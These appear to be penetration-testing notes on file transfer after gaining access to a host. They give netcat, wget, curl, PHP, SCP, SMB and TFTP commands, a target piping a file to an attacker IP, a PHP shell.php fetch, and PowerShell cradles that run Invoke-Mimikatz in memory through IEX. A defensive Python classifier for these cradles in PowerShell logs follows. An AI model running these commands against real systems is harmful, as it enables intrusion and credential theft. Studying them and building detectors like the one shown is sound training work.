Transferring files
The first step after gaining access to a remote machine is usually to upload new tools. Netcat can move a file in either direction.
on target run:
nc -lvp 443 > transfer.txt
on attacker run:
nc $ip 443 < transfer.txt
or
on attacker run:
nc -lvp 443 > transfer.txt
on target run:
cat transfer.txt | nc $attackerip 443
In the first form the attack box connects to port 443 on the target and pushes transfer.txt up to it; in the second the target connects back to port 443 on the attack box, which writes what it receives to transfer.txt. Netcat does not know when the file has ended, so close the sending side (Ctrl-C) once the transfer is done and compare sizes or checksums on both ends.
If you ever happen to have a shell on a UNIX system and cannot find a way to upload anything, this is a lifesaver trick you can try (the file travels as a single base64 line pasted into the shell, so it only suits small files):
On local system:
cat filetoupload | base64 -w 0; echo
#double click on output to copy
On Target System:
echo <copiedContent> | base64 -d > filetoupload
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh   # download a file using wget
curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh   # download a file using cURL
php -r '$file = file_get_contents("https://<snip>/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'   # download a file using PHP
scp C:\Temp\bloodhound.zip <user>@10.10.10.150:/tmp/bloodhound.zip   # upload a file using SCP
scp <user>@<ip>:/tmp/mimikatz.exe C:\Temp\mimikatz.exe   # download a file using SCP
# TFTP server (atftpd) serving files out of /tftp
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /usr/share/windows-binaries/nc.exe /tftp/
nano /etc/default/atftpd # confirm that /tftp is the directory - otherwise it can't find the file
service atftpd restart
python -m SimpleHTTPServer        # Python 2 HTTP server, port 8000 by default
python3 -m http.server            # Python 3 HTTP server, port 8000 by default
php -S $ip:80                     # PHP built-in web server
nc -nlvp 4444 > incoming.exe      # receive a file with netcat
use auxiliary/server/ftp          # Metasploit FTP server
use auxiliary/server/tftp         # Metasploit TFTP server
pip install pyftpdlib
python -m pyftpdlib -p 21         # quick Python FTP server on port 21
python smbserver.py WORKSPACE /dir            # Impacket SMB share named WORKSPACE
smbserver.py devel /root/Desktop/htb/devel    # Impacket SMB share named devel
curl -T file "http://$ip/"        # upload a file with an HTTP PUT; double quotes so $ip expands, trailing slash so curl appends the file name
smbclient -L 1.1.1.1 --no-pass    # list SMB shares without a password
wget https://gist.githubusercontent.com/UniIsland/3346170/raw/059aca1d510c615df3d9fedafabac4d538ebe352/SimpleHTTPServerWithUpload.py ; chmod +x SimpleHTTPServerWithUpload.py; ./SimpleHTTPServerWithUpload.py   # Simple HTTP Server with Upload
<?php file_put_contents("/var/tmp/shell.php", file_get_contents("http://10.11.0.245/shell.php")); ?>   # PHP: fetch a file and write it to disk
python -c "from urllib import urlretrieve; urlretrieve('http://10.11.0.245/nc.exe', 'C:\\Temp\\nc.exe')"   # Python 2 urllib download on a Windows host
In most environments, HTTP/HTTPS traffic is allowed out of the firewall in some form - and if we have a GUI session, a web browser could also be used. However, from a Windows shell, PowerShell offers many file transfer options. In any version of PowerShell, the System.Net.WebClient class can be used to download a file over HTTP.
PS C:\htb> (New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1',"C:\Users\Public\Downloads\PowerView.ps1")
From PowerShell 3.0, Invoke-WebRequest is also available, but it is noticeably slower at downloading files. The aliases iwr, curl, and wget can be used instead of Invoke-WebRequest. The LOLBAS project keeps a list of other Windows built-ins that can download files: https://lolbas-project.github.io/#/download
PS C:\htb> Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1
Instead of downloading to disk, the payload can be executed in memory using Invoke-Expression or its alias iex.
PS C:\htb> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')
IEX also accepts pipeline input.
PS C:\htb> Invoke-WebRequest https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1 | iex
There may be cases when the Internet Explorer first-launch configuration has not been completed, which prevents the download. This can be bypassed using the parameter -UseBasicParsing.
PS C:\htb> Invoke-WebRequest https://<ip>/PowerView.ps1 | iex
Invoke-WebRequest : The response content cannot be parsed because the Internet Explorer engine is not available, or Internet Explorer's first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again.
At line:1 char:1
+ Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/P ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotImplemented: (:) [Invoke-WebRequest], NotSupportedException
+ FullyQualifiedErrorId : WebCmdletIEDomNotSupportedException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
PS C:\htb> Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | iex
PS C:\htb> Invoke-CheckLocalAdminAccess
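Added example (Python, not part of these notes): a small classifier for PowerShell script-block log text (the text field of Event ID 4104 entries) that flags the download cradles shown in this section and separates download-to-disk from download-and-execute, which is the one that should page someone. The sample script blocks are constructed, <ip> is a placeholder, and the rule names and weights are assumptions of this example rather than any product's signatures.

```python
import re

# Constructed sample script-block texts modelled on the one-liners above;
# <ip> is a placeholder and none of these lines come from a real log export.
SAMPLE_SCRIPT_BLOCKS = [
    "(New-Object System.Net.WebClient).DownloadFile('https://<ip>/PowerView.ps1',"
    "'C:\\Users\\Public\\Downloads\\PowerView.ps1')",
    "IEX (New-Object Net.WebClient).DownloadString('https://<ip>/Invoke-Mimikatz.ps1')",
    "Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | iex",
    "iwr https://<ip>/PowerView.ps1 -OutFile PowerView.ps1",
    "Get-ChildItem C:\\Users\\Public\\Downloads | Select-Object Name",
]

# A cradle has two halves: fetching content, and handing it to the engine.
DOWNLOAD_RULES = {
    # WebClient.DownloadFile / DownloadString, with or without the System. prefix
    "webclient_download": re.compile(r"Net\.WebClient\)?\s*\.\s*Download(File|String)\s*\(", re.I),
    # Invoke-WebRequest and its aliases; curl/wget are noisy where a real curl.exe is in use
    "invoke_webrequest": re.compile(r"(?<![\w-])(Invoke-WebRequest|iwr|curl|wget)(?![\w-])", re.I),
}
EXEC_RULES = {
    "invoke_expression": re.compile(r"(?<![\w-])(IEX|Invoke-Expression)(?![\w-])", re.I),
    "pipe_to_iex": re.compile(r"\|\s*(iex|Invoke-Expression)(?![\w-])", re.I),
}
CONTEXT_RULES = {
    # Shows up with IWR cradles on hosts where the IE first-launch wizard never ran
    "use_basic_parsing": re.compile(r"-UseBasicParsing(?![\w-])", re.I),
}
ALL_RULES = {**DOWNLOAD_RULES, **EXEC_RULES, **CONTEXT_RULES}

def classify_script_block(text):
    """Return (verdict, matched rule names) for one script-block text."""
    hits = [name for name, rx in ALL_RULES.items() if rx.search(text)]
    downloads = any(name in DOWNLOAD_RULES for name in hits)
    executes = any(name in EXEC_RULES for name in hits)
    if downloads and executes:
        return "download-and-execute", hits   # fetched content goes straight into the engine
    if downloads:
        return "download-to-disk", hits       # lower priority; pair with file-creation events
    return "none", hits

def scan_blocks(blocks):
    """Classify every block, preserving input order."""
    return [classify_script_block(b) for b in blocks]

if __name__ == "__main__":
    for block, (verdict, hits) in zip(SAMPLE_SCRIPT_BLOCKS, scan_blocks(SAMPLE_SCRIPT_BLOCKS)):
        print(f"{verdict:21} {hits}  <- {block[:60]}")
```

Script-block logging has to be enabled (Turn on PowerShell Script Block Logging policy) for 4104 events to exist at all, so check that before trusting silence from this rule set.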